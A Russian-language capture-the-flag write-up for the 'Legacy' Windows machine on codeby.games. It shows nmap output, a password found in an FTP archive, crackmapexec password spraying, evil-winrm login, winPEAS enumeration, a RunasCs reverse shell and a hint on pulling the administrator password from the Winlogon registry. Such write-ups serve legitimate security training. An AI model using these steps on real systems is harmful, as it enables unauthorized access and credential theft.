Writeup Legacy (CodebyGames)
Предисловие.
Начиная с этой статьи и далее будут только направление для решения задач.
Решение.
Получаем ip на платформе codeby.games
Проводим разведку и сбор информации о цели с помощью nmap.
┌──(root㉿kali)-[~/codeby_game/Legacy]
└─# nmap -sVC -A 192.168.2.15 -oA scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-18 04:38 EDT
Nmap scan report for 192.168.2.15
Host is up (0.019s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-03-24 02:39PM <DIR> ftp_s
| 03-03-24 02:43PM 1185 hashes.zip
| 03-03-24 02:42PM 6206 Hydra-SUID-1000.zip
| 03-03-24 02:43PM 72398 maths_embed.png
| 03-03-24 02:41PM 324 post.txt
| 03-03-24 02:40PM 566 qasm.py
| 03-03-24 02:40PM 12659 quantum_artifact.qasm
| 03-03-24 02:37PM 7986 task.zip
|_04-13-24 01:12PM 11994 users.zip
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-18 08:38:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: codeby.cdb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: codeby.cdb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 2 hops
Service Info: Host: LEGACY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-18T08:38:52
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -2s
TRACEROUTE
HOP RTT ADDRESS
1 19.42 ms 192.168.2.15
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.46 seconds
Из интересного, видим FTP, пробуем авторизацию под анонимом, на этот раз я буду подключаться через графический интерфейс программы FileZila, для того что бы минимизировать получение битого файла при скачивании с помощью команды get.
И так мы видим интересный архив с не менее интересным названием users.zip его и скачаем, а далее распакуем.
┌──(root㉿kali)-[~/codeby_game/Legacy]
└─# unzip users.zip
Archive: users.zip
Password for newbie users is L3g_etnw
replace users.html? [y]es, [n]o, [A]ll, [N]one, [r]ename:
Мы видим, что у нас есть какой-то пароль, отлично. Посмотрим содержимое архива.
Содержимое архива всего лишь два файла, нас интересует файл с расширением .html там будет список пользователей, собираем все в отдельный файл.
После того как собрали всех пользователей проводим атку password spraying, при помощи программы crackmapexec.
┌──(root㉿kali)-[~/codeby_game/Legacy]
└─# crackmapexec smb 192.168.2.15 -u users.txt -p $passwd
Полученные валидные данные сохраняем и пробуем подключится к машине и проводим осмотр.
┌──(root㉿kali)-[~/codeby_game/Legacy]
└─# evil-winrm -i 192.168.2.15 -u 'user' -p 'password'
Загрузим на машину программу winPEAS, после того как вы загрузите, а далее запустите и получите вывод программы, просмотрите его очень внимательно. Если вы внимательны, то увидите еще один пароль с которым так же нужно провести выше названную атаку (password spraying).
И так у нас есть две УЗ, только возникает проблема, что вторые УЗ у нас не имеет подключение, значит вернемся к первой УЗ и снова подключимся к машине. Для того, что бы найти флаг нам нужно воспользоваться одной интересной программой под названием RunasCs.exe, которую можно найти здесь об этом ресурсе я уже писал в первой части прохождения локальной лаборатории, кто еще не читал можете ознакомиться здесь. После того как загрузили программу читаем help и составляем запрос следующего вида:
И на хосте запускаем слушатель следующей командой:
Таким образом мы получим шелл на свою машину и забираем первую часть флага.
Повышение привилегий.
Для того, что бы повысить привилегии нам необходимо получить пароль администратора в открытом виде, который можно найти в reg query и Winlogon, в качестве подсказки оставлю ссылку на ресурс здесь.